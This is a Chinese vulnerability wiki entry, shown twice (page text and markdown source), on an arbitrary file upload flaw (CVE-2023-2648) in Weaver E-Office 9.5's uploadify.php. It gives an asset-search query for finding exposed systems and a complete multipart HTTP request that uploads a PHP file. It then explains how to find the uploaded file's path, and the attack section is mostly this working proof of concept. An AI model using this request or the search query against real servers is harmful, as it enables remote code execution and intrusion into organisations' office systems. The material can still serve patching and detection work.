fofamini-wiki

登录白背景

源码

泛微E-Office uploadify存在任意文件上传漏洞(CVE-2023-2648)

一、漏洞简介

泛微 E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 9.5版本存在代码问题漏洞，该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: test
Connection: close
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

根据回显拼接得到上传文件位置

/attachment/1031311196/666.php

原文: https://www.yuque.com/xiaokp7/ocvun2/ny1gtlrpgdxuot8b

# 泛微E-Office uploadify存在任意文件上传漏洞(CVE-2023-2648)

# 一、漏洞简介
泛微 E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 9.5版本存在代码问题漏洞，该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传。

# 二、影响版本

- 泛微 E-Office 9.5

# 三、资产测绘

- hunter`app.name="泛微 e-office OA"`
- 特征

![image.png](./img/YRRc7rjWzQPeoWnl/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-787023.png)

# 四、漏洞复现
```
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: test
Connection: close
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
```
![image.png](./img/YRRc7rjWzQPeoWnl/1699626187799-74d8cd8f-7694-4cef-8d2e-d35f2ac91d9e-202003.png)
根据回显拼接得到上传文件位置
```
/attachment/1031311196/666.php
```
![image.png](./img/YRRc7rjWzQPeoWnl/1699626229126-afcb7e78-38f5-40b1-9e27-a0cd732f7de2-174575.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ny1gtlrpgdxuot8b>